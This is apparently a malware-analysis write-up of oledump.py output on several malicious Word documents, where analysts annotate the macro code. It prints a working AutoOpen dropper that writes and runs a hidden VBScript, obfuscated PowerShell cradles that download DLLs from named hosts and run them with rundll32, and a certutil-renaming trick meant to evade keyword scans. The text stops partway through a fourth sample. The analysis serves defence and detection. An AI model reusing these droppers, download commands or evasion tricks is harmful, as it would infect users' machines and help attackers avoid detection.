6: 97 'Macros/Form/\x01CompObj'
7: 283 'Macros/Form/\x03VBFrame'
8: 63528 'Macros/Form/f'
9: 2220 'Macros/Form/o'
10: 566 'Macros/PROJECT'
11: 92 'Macros/PROJECTwm'
12: M 6655 4978+1677 'Macros/VBA/Form'
13: M 15671 13867+1804 'Macros/VBA/Module1'
14: M 1593 1396+197 'Macros/VBA/ThisDocument'
15: 42465 'Macros/VBA/_VBA_PROJECT'
16: M 2724 2397+327 'Macros/VBA/bxh'
17: 1226 'Macros/VBA/dir'
18: 4096 'WordDocument'
└─$ ./oledump.py attacker2.doc -s a -v
Attribute VB_Name = "Form"
Attribute VB_Base = "0{6BC9B63B-B929-462A-868D-366CD3790D09}{4A072285-D56F-4077-875E-A6D43D6C1272}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Space-separated list of accepted top-level domains consumed by IsEmail. Note that IsEmail tests
' membership with InStr, i.e. as a substring match against this whole string, not as a whole-word
' lookup. Nothing on the AutoOpen -> bxh.eFile path uses it; it reads as benign filler.
Private Const Dominios As String = "AERO BIZ COM COOP EDU GOV INFO INT MIL MUSEUM NAME NET ORG PRO " & _
"AC AD AE AF AG AI AL AM AN AO AQ AR AS AT AU AW AZ BA BB BD " & _
"BE BF BG BH BI BJ BM BN BO BR BS BT BV BW BY BZ CA CC CD CF " & _
"CG CH CI CK CL CM CN CO CR CU CV CX CY CZ DE DJ DK DM DO DZ " & _
"EC EE EG EH ER ES ET FI FJ FK FM FO FR GA GD GE GF GG GH GI " & _
"GL GM GN GP GQ GR GS GT GU GW GY HK HM HN HR HT HU ID IE IL " & _
"IM IN IO IQ IR IS IT JE JM JO JP KE KG KH KI KM KN KP KR KW " & _
"KY KZ LA LB LC LI LK LR LS LT LU LV LY MA MC MD MG MH MK ML " & _
"MM MN MO MP MQ MR MS MT MU MV MW MX MY MZ NA NC NE NF NG NI " & _
"NL NO NP NR NU NZ OM PA PE PF PG PH PK PL PM PN PR PS PT PW " & _
"PY QA RE RO RU RW SA SB SC SD SE SG SH SI SJ SK SL SM SN SO " & _
"SR ST SV SY SZ TC TD TF TG TH TJ TK TM TN TO TP TR TT TV TW " & _
"TZ UA UG UK UM US UY UZ VA VC VE VG VI VN VU WF WS YE YT YU " & _
"ZA ZM ZW"
Public Function IsEmail(ByVal Email As String) As Boolean
' Syntactic e-mail check: exactly one "@", at least one ".", no leading/trailing "@" or ".",
' no "@." / ".@" / "..", only [a-z0-9@.-_] characters, and a TLD found in Dominios.
' Returns False for an empty string. Not referenced by the malicious AutoOpen -> bxh.eFile path;
' it appears to be filler code bundled into the form module.
Dim w As Integer
Dim sLetra As String
Dim sSplit() As String
On Error Resume Next
If Len(Email) > 0 Then
If UBound(Split(Email, "@")) <> 1 Or InStr(Email, ".") = 0 Then
Exit Function
End If
If left$(Email, 1) = "@" Or Mid$(Email, Len(Email), 1) = "@" Or InStr(Email, "@.") Or InStr(Email, ".@") Then
Exit Function
End If
If left$(Email, 1) = "." Or Mid$(Email, Len(Email), 1) = "." Or InStr(Email, "..") Then
Exit Function
End If
' Character whitelist, one character at a time.
For w = 1 To Len(Email)
sLetra = Mid$(Email, w, 1)
If Not (LCase$(sLetra) Like "[a-z]" Or sLetra = "@" Or sLetra = "." Or sLetra = "-" Or sLetra = "_" Or IsNumeric(sLetra)) Then
Exit Function
End If
Next w
' TLD check is a substring search in the space-separated list, so a one- or two-letter
' fragment of a longer entry (e.g. "M" inside "COM") also passes.
sSplit = Split(UCase$(Trim$(Email)), ".")
If InStr(Dominios, sSplit(UBound(sSplit))) = 0 Then
Exit Function
End If
IsEmail = True
End If
On Error GoTo 0
End Function
Attribute VB_Name = "Module1"
Public Sub getFrameInfo(ByVal lpMP3File As String, ByRef lpFrameInfo As FHInfo, ByVal lpMP3Offset As Long)
' Reads a 4-byte MPEG audio frame header from lpMP3File at lpMP3Offset and decodes it into lpFrameInfo.
' Nothing on the AutoOpen -> bxh.eFile path calls this; together with IsEmail and Valid_MP3 it reads as
' benign filler, presumably included to make the project look legitimate and to bulk up Module1.
' The type FHInfo and the array arrBitRates are not defined in any of the dumped modules.
' lpMP3File:   file opened below in Binary mode.
' lpFrameInfo: receives the decoded fields; .Succes is True only when all three sync checks pass.
' lpMP3Offset: 1-based byte position at which the 0xFF sync byte is expected.
Dim Buf As String * 4096
Dim tmpByte1 As Byte
Dim tmpByte2 As Byte
Dim tmpByte3 As Byte
Dim tmpByte4 As Byte
Dim tmpNum As Byte
Dim designator As Byte
Dim tmpLayer As Byte
Dim baseFreq As Single
Dim refFile As Integer
' Any runtime error (e.g. reading past end of file) jumps to BadFrame, which resumes at the shared cleanup.
On Error GoTo BadFrame
lpFrameInfo.Succes = False
refFile = FreeFile
Open lpMP3File For Binary As #refFile
' Byte 1: frame sync must be 0xFF.
Get #refFile, lpMP3Offset, tmpByte1
If tmpByte1 <> &HFF Then
On Error GoTo 0
Close #refFile
Exit Sub
End If
' Byte 2: remaining sync bits plus version/layer must fall in one of the accepted ranges.
Get #refFile, , tmpByte2
If Not (Between(tmpByte2, &HE2, &HE7) Or Between(tmpByte2, &HF2, &HF7) Or Between(tmpByte2, &HFA, &HFF)) Then
On Error GoTo 0
Close #refFile
Exit Sub
End If
' Byte 3: bit-rate index must not be 0 (free) or 15 (reserved), sampling index must not be 3 (reserved).
Get #refFile, , tmpByte3
If Not (((tmpByte3 And &HF0) <> &H0) And ((tmpByte3 And &HF0) <> &HF0) And ((tmpByte3 And &HC) <> &HC)) Then
On Error GoTo 0
Close #refFile
Exit Sub
End If
Get #refFile, , tmpByte4
'Getting info from 2nd byte
'Getting MPEG type info
Select Case (tmpByte2 \ 8) Mod 4
Case 0
lpFrameInfo.MPEGType = 3 'MPEG v2.5
designator = 1
Case 2
lpFrameInfo.MPEGType = 2 'MPEG v2
designator = 2
Case 3
lpFrameInfo.MPEGType = 1 'MPEG v1
designator = 4
End Select
'Getting layer info
Select Case (tmpByte2 \ 2) Mod 4
Case 1
lpFrameInfo.Layer = 3
tmpLayer = 3
Case 2
lpFrameInfo.Layer = 2
tmpLayer = 2
Case 3
lpFrameInfo.Layer = 1
tmpLayer = 1
End Select
'Getting CRC info
lpFrameInfo.Protection = (tmpByte2 Mod 2) - 1
'Getting info from 3rd byte
'Getting Bit-rate
lpFrameInfo.BitRateIndex = (tmpByte3 \ 16) Mod 16
lpFrameInfo.bitRate = arrBitRates((tmpByte2 \ 8) Mod 4, (tmpByte2 \ 2) Mod 4, (tmpByte3 \ 16) Mod 16)
'Getting frequency info (also known as Sampling Rate)
Select Case (tmpByte3 \ 4) Mod 4
Case 0
lpFrameInfo.SamplingRate = 11025
Case 1
lpFrameInfo.SamplingRate = 12000
Case 2
lpFrameInfo.SamplingRate = 8000
End Select
' Base rate is scaled by the version designator set above (x1 v2.5, x2 v2, x4 v1).
lpFrameInfo.SamplingRate = lpFrameInfo.SamplingRate * designator
'Getting number of samples
Select Case tmpLayer
Case 1
lpFrameInfo.Samples = 384
Case 2
lpFrameInfo.Samples = 1152
Case 3
If designator = 4 Then
lpFrameInfo.Samples = 1152
Else
lpFrameInfo.Samples = 576
End If
End Select
'Getting Padding (if set data is padded with one slot)
lpFrameInfo.Padding = (tmpByte3 \ 2) Mod 2
'Getting Private info
lpFrameInfo.PrivateBit = -(tmpByte3 Mod 2)
'Getting info from 4th byte
'Getting channel mode info
lpFrameInfo.ChannelMode = (tmpByte4 \ 64) Mod 4
lpFrameInfo.ModeExtension = (tmpByte4 \ 16) Mod 4
'Getting Copyright bit
lpFrameInfo.copyright = -((tmpByte4 \ 8) Mod 2)
'Getting Original bit
lpFrameInfo.Original = -((tmpByte4 \ 4) Mod 2)
'Getting Emphasis
lpFrameInfo.Emphasis = tmpByte4 Mod 4
'Calculate Frame Size
If tmpLayer = 1 Then
lpFrameInfo.FrameSize = (((lpFrameInfo.Samples * lpFrameInfo.bitRate) \ lpFrameInfo.SamplingRate) \ 2) + lpFrameInfo.Padding
Else
lpFrameInfo.FrameSize = (((lpFrameInfo.Samples * lpFrameInfo.bitRate) \ lpFrameInfo.SamplingRate) \ 8) + lpFrameInfo.Padding
End If
lpFrameInfo.Succes = True
' Shared cleanup for both the success path and the error handler below.
GoodFrame:
On Error GoTo 0
Close #refFile
Exit Sub
BadFrame:
Resume GoodFrame
End Sub
Public Function Valid_MP3(Track As String) As Boolean
' Returns True when a parseable MPEG frame is found in Track after any leading ID3v2 tag.
' MP3Info, GetID3v2Header, ID3v2Header and getMP3Info are not defined in the dumped source,
' and nothing on the malicious AutoOpen -> bxh.eFile path calls this routine (filler code).
Dim accMP3Info As MP3Info
Dim MP3Offset As Long
Dim ExtraOffset As Long
Valid_MP3 = False
MP3Offset = 1
' ID3v2 tag length is four 7-bit ("synchsafe") bytes, hence the 2^21/2^14/2^7 weights;
' the +11 presumably skips the 10-byte tag header with VBA's 1-based Get offsets.
If GetID3v2Header(Track) Then MP3Offset = (ID3v2Header.bSize1 * (2 ^ 21)) + (ID3v2Header.bSize2 * (2 ^ 14)) + (ID3v2Header.bSize3 * (2 ^ 7)) + ID3v2Header.bSize4 + 11
' ExtraOffset is assigned but never read.
ExtraOffset = getMP3Info(Track, accMP3Info, MP3Offset)
If Not accMP3Info.Succes Then Exit Function
Valid_MP3 = True
End Function
Public Function Between(ByVal accNum As Byte, ByVal accDown As Byte, ByVal accUp As Byte) As Boolean
' Inclusive range test used by getFrameInfo's sync-byte checks: accDown <= accNum <= accUp.
If accNum >= accDown And accNum <= accUp Then
Between = True
Else
Between = False
End If
End Function
Private Sub UserForm_Click()
' Empty click handler; the form is never shown by the macro, only instantiated by bxh.eFile to read a control Caption.
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' Auto-executes when the document is opened. The only action is a hand-off to module bxh,
' whose eFile drops C:\ProgramData\pin.vbs and runs it with cscript.exe in a hidden window.
bxh.eFile
End Sub
Attribute VB_Name = "bxh"
Sub eFile()
' Dropper: writes the text held in the Caption of control t2 on the UserForm "Form" to
' C:\ProgramData\pin.vbs and launches it with cscript.exe in a hidden window. All path and
' command strings are stored reversed and rebuilt with StrReverse at run time.
Dim QQ1 As Object
' The form is instantiated only as a container; its control properties carry the payload.
' The YARA hit for priyacareers.com is reported under stream 9 'Macros/Form/o', consistent with
' the LL1..LL5 / OK1..OK5 VBScript lines recovered with -S living in the form's control data.
Set QQ1 = New Form
' "\ataDmargorP\:C" reversed -> "C:\ProgramData\"
RO = StrReverse("\ataDmargorP\:C")
' "sbv.nip" reversed -> "pin.vbs", so ROI = "C:\ProgramData\pin.vbs"
ROI = RO + StrReverse("sbv.nip")
' Unused decoys.
ii = StrReverse("")
Ne = StrReverse("IZOIZIMIZI")
' Payload text = Caption of control t2.
WW = QQ1.t2.Caption
MyFile = FreeFile
Open ROI For Output As #MyFile
Print #MyFile, WW
Close #MyFile
' Reversed: "cmd /k cscript.exe C:\ProgramData\pin.vbs"; Chr(48) = "0", coerced to window style 0 (vbHide).
fun = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48))
' Hard-stops all VBA execution once the dropper has been launched.
End
End Sub
└─$ ./oledump.py attacker2.doc -s a -v | grep "fun" | rev
))84(rhC ,)"cmd /k cscript.exe C:\ProgramData\pin.vbs"(esreveRrtS(llehS = nuf
└─$ ./oledump.py attacker2.doc -s a -S | grep -i http
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
http://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.0-c000 79.1357c9e, 2021/07/14-00:39:56 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmp:CreateDate="2021-08-27T15:09:07+03:00" xmp:MetadataDate="2021-08-27T15:09:07+03:00" xmp:ModifyDate="2021-08-27T15:09:07+03:00" xmpMM:InstanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" xmpMM:DocumentID="adobe:docid:photoshop:a6ff4835-a81e-3c4a-ad29-4ec6f468fa58" xmpMM:OriginalDocumentID="xmp.did:e6133924-10f4-ac47-ac6d-bd901a15998b" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:e6133924-10f4-ac47-ac6d-bd901a15998b" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
http://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.0-c000 79.1357c9e, 2021/07/14-00:39:56 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmp:CreateDate="2021-08-27T15:09:07+03:00" xmp:MetadataDate="2021-08-27T15:09:07+03:00" xmp:ModifyDate="2021-08-27T15:09:07+03:00" xmpMM:InstanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" xmpMM:DocumentID="adobe:docid:photoshop:a6ff4835-a81e-3c4a-ad29-4ec6f468fa58" xmpMM:OriginalDocumentID="xmp.did:e6133924-10f4-ac47-ac6d-bd901a15998b" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:e6133924-10f4-ac47-ac6d-bd901a15998b" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:f70ea248-19e3-3e45-bfdb-49055c3c1960" stEvt:when="2021-08-27T15:09:07+03:00" stEvt:softwareAgent="Adobe Photoshop 22.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
LL1 = "$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://priyacareers.com/u9hDQN9Yy7g/pt.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL2 = "$Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL3 = "$Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL4 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://cablingpoint.com/ByH5NDoE3kQA/pt.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL5 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
HTTPS — every download URL in the LL1..LL5 lines uses https://, so the DLL transfers will not be visible to plaintext-HTTP inspection; hunt on the hostnames (DNS, TLS SNI, proxy logs) and on the drop paths C:\ProgramData\www1.dll .. www5.dll (each then loaded with `rundll32.exe <dll>,ldr`, see the OK1..OK5 lines) instead.
└─$ ./oledump.py attacker2.doc -s a -S | grep -i ".dll"
LL1 = "$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://priyacareers.com/u9hDQN9Yy7g/pt.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL2 = "$Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL3 = "$Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL4 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://cablingpoint.com/ByH5NDoE3kQA/pt.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL5 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"
OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"
OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"
OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"
olepro32.dll@
gdiplus.dll
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\SysWOW64\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#C:\Windows\SysWOW64\scrrun.dll#Microsoft Scripting Runtime
*\G{6BF52A50-394A-11D3-B153-00C04F79FAA6}#1.0#0#C:\Windows\system32\wmp.dll#Windows Media Player
└─$ ./oledump.py --yara=#s#priyacareers.com attacker2.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7427 '1Table'
5: 63641 'Data'
6: 97 'Macros/Form/\x01CompObj'
7: 283 'Macros/Form/\x03VBFrame'
8: 63528 'Macros/Form/f'
9: 2220 'Macros/Form/o'
YARA rule: string
10: 566 'Macros/PROJECT'
11: 92 'Macros/PROJECTwm'
12: M 6655 'Macros/VBA/Form'
13: M 15671 'Macros/VBA/Module1'
14: M 1593 'Macros/VBA/ThisDocument'
15: 42465 'Macros/VBA/_VBA_PROJECT'
16: M 2724 'Macros/VBA/bxh'
17: 1226 'Macros/VBA/dir'
18: 4096 'WordDocument'
All VBA source code:
attacker - 02
└─$ ./oledump.py attacker3.doc
A: word/vbaProject.bin
A1: 423 'PROJECT'
A2: 53 'PROJECTwm'
A3: M 2017 'VBA/T'
A4: m 1127 'VBA/ThisDocument'
A5: 2976 'VBA/_VBA_PROJECT'
A6: 1864 'VBA/__SRP_0'
A7: 190 'VBA/__SRP_1'
A8: 348 'VBA/__SRP_2'
A9: 106 'VBA/__SRP_3'
A10: M 1291 'VBA/d'
A11: 723 'VBA/dir'
--------------------------------------------------------
./oledump.py attacker3.doc -s a -S
ID="{605989F3-020E-4223-90DF-C1F27C11FDA6}"
Document=ThisDocument/&H00000000
Module=T
Module=d
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="8A8842DAC8DEC8DEC8DEC8DE"
DPB="1416DC54ECDFEDDFEDDF"
GC="9E9C56EE6AF2F5F3F5F30A"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
T=0, 0, 0, 0, C
d=0, 0, 0, 0, C
ThisDocument
tThisDocument
12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77$
cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
Attribut
e VB_Nam
e = "T"
Sub aut
oopen()
dh("1
2%2%11%7`9%64%
7%28%10%
.26%8
6%29%3%73
44%85%51
F0%8
2%43%
94%65
t74%
h\2%
w0%1
7"@y
m XN As
New WshS
hell
.run(
"cmd /c
set u=tu@til&&c
opy C:\W
indows\S
ystem32\
cer%u%.e
Progr
amData\1a
", 0
End
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Spac
Crea
tabl
Pre decla
BExp
Temp
lateDeri
$Custom
(1Normal.ThisDocument
$*\Rffff*08610d3149
WordS10
Win16
Win32
Win64F
VBA6
VBA7
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
Module1b
autoopen
WshShell
run_
eR ]0
Split
ChrK~0
IWshRuntimeLibrary
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}#1.0#0#C:\Windows\system32\wshom.ocx#Windows Script Host Object Model
ThisDocument
08610d3149
ThisDocument
04610d3149
05610d3149
*\CNormalrU
b=q9
ThisDocument
Project
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
Word
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
C:\Windows\system32\wshom.ocx
IWshRuntimeLibrary
Document
util'
Attribut
e VB_Nam
e = "d"
Functio
n h(ju)
dSpli
<, "%"
P@For lc
To UBou nd(eR
& Chr
&(lc) X
>Next
}vY(
L"util
Project
rstd
ole>
\G{00020
430-
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2
DF8D04C-
5BFA-101@B-BDE5
gAjA
ram File
s\Common
Microso
ft Share
d\OFFICE
16\MSO.D
M 16 .0 Ob
ibrary
IWsh
RuntimeD
sA@eR
n@ji
y@mx
UAmF935D
C20-1CF
1D0-ADB9
@9C04FD58@A0B}#1Mms
Emwshom.o
t Scr
ipt Host
E0Model
ThisDo
cumentG
T@1i
c@3m
gn@4
!Cd"B
------------------------------------------
./oledump.py attacker3.doc -s a -S | grep exe
cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
The Substitution Explained
The command runs under cmd.exe, not PowerShell: `set u=tutil` defines the environment variable `u`, and the path `C:\Windows\System32\cer%u%.exe` is built by expanding `%u%`. The `call` in front of `copy` is what makes the trick work: cmd expands `%u%` once, when it parses the whole `cmd /c` line, i.e. before `set` has run, so without `call` the path would still read `cer%u%.exe` when `copy` executes; `call` re-parses the `copy` command after `set` has run, so `%u%` becomes `tutil` at that point. Splitting the name this way keeps the literal string `certutil` out of the macro so simple keyword scans miss it.
When you put them together:
-
Take the first part:
cer -
Add the variable
u:tutil -
Add the extension:
.exe -
Result:
certutil.exe — a signed Microsoft binary (a LOLBin) copied to C:\ProgramData\1.exe so it can later be run under an innocuous name. The copy itself does nothing, so the analysis should not stop here: the `%`-separated number string passed to `dh(...)` in module `T` is the next command. Function `h` in module `d` splits it on `%` and turns each value into a character (see the `Split`, `Chr` and what appears to be an `Xor` fragment in the strings dump), so decoding that string — the single-byte key is not legible in the raw dump — should yield the command line that actually drives the renamed certutil (its `-urlcache`/`-decode` modes are the usual next step; confirm by decoding).
attacker - 04
./oledump.py --yara=#s#1.exe attacker3.doc
A: word/vbaProject.bin
A1: 423 'PROJECT'
A2: 53 'PROJECTwm'
A3: M 2017 'VBA/T'
YARA rule: string
A4: m 1127 'VBA/ThisDocument'
A5: 2976 'VBA/_VBA_PROJECT'
A6: 1864 'VBA/__SRP_0'
A7: 190 'VBA/__SRP_1'
A8: 348 'VBA/__SRP_2'
A9: 106 'VBA/__SRP_3'
A10: M 1291 'VBA/d'
A11: 723 'VBA/dir'
All VBA source code:
YARA rule: string
└─$ ./oledump.py attacker4.doc -v
1: 113 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 4096 '1Table'
5: 438 'Macros/PROJECT'
6: 41 'Macros/PROJECTwm'
7: M 17216 'Macros/VBA/ThisDocument'
8: 10917 'Macros/VBA/_VBA_PROJECT'
9: 515 'Macros/VBA/dir'
10: 4142 'WordDocument'
-----------------------------------------------------------------------------
└─$ ./oledump.py attacker4.doc -v -s 7
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Analyst annotations (comment lines) were added for the writeup; the sample code itself is unchanged. ---
' Hextostring: decodes a hex string (two characters per byte) into the string of the corresponding
' Chr$ values. Everything else in the function is dead padding: "N = N + 1" is never true, the
' "3786 < 26"-style tests are never true, and every Len("12-char literal") = Len("8-char literal")
' comparison is 12 = 8 -> False, so none of the MsgBox/End statements ever execute.
Public Function Hextostring(ByVal LIfBaRNaq As String) As String
Dim bOYvqTVCQck As String
